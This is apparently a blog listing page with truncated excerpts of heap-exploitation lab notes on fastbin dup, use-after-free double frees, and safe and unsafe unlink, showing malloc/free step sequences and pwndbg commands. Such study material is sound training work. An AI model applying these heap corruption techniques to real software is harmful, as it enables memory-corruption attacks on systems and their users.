Challange Fastbin-Dup
Attacking fastbin and avoid 0x70 protection First Fastbin1.- Write fake size malloc(24,p64(0x61)) 2.- Write fake size in main arena malloc(24,'C'*48) malloc(24,'D'*48) Second Fastbin for link fake chunk in fastbins list3.-Fastbin chunk_J=malloc(0X58,'C'*48) chunk_K=malloc(0x58,'D'*48) free(chunk_J) free(chunk_K) fr..
Read more
Fastbin with Use-After-Free
Fastbin with Use-After-Free 1.- Request two 0x50 size chunk chunk_A = malloc(24, b"A"*24) chunk_B = malloc(24, b"B"*24) 2.- Free chunk A free(chunk_A) 3.- Free chunk B free(chunk_B) 4.- Free chunk A free(chunk_A) 5.- malloc(24,b’C’*24) malloc(24,b'C'*24) 6.- There are the CCCCCCC… where before was the 7020 pointer :O, so ..
Read more
Safe Unlink
Safe UnlinkChecksec Tips Avoid use ‘vis’ command when corrupted the heap Some commands pwndbg> p *((struct malloc_chunk*)0x603010).fd pwndbg> dq mp_-sbrK_base pwndbg> p__free_hook pwndbg> ds m_array[0].user_data Reflected write1. Prepare chunks 2. Bypass protectionscorrupted size vs. prev_sizefd = 0xdeadbeef bk = 0xcafebabe prev_size = 0x90 f..
Read more
Unsafe Unlink
Unsafe UnlinkNotes Chunks are considerated “small” when their size is less than 0x400. Remember that an easy way to request a chunk of a specific size is to subtract eightfrom the size you want. Analizing binariepwndbg> r Starting program: /home/user-pwn18/Escritorio/PWN/HeapLAB/unsafe_unlink/unsafe_unlink ERROR: Could not find ELF base! ============..
Read more